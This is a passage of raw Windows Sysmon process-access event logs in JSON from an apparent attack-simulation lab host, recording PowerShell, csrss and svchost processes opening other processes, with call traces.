C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ef50c0fb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9ad1d5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9acea6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ef45e2bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee96da3c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9cbf0b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9af570|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9af570|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9af401|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9a1386|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9ad8b9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9ad4ac|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9ad1d5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9acea6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ef45e2bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee993d07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9932d7","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.576","SourceProcessGUID":"{E2A3D6B1-13D2-5F25-0000-00106C1E1200}","SourceProcessId":"1360","SourceThreadId":"3452","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-13B8-5F25-0000-0010896E1100}","TargetProcessId":"4692","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ef50c0fb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9ad1d5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9acea6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ef45e2bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee96da3c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9cbf0b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9af570|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9af570|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9af401|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9a1386|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9ad8b9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9ad4ac|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9ad1d5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9acea6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ef45e2bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee993d07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ee9932d7","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9261,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.576\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13B8-5F25-0000-0010896E1100}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.576","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13B8-5F25-0000-0010896E1100}","TargetProcessId":"4692","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9262,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9263,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9264,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9265,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9266,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9267,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 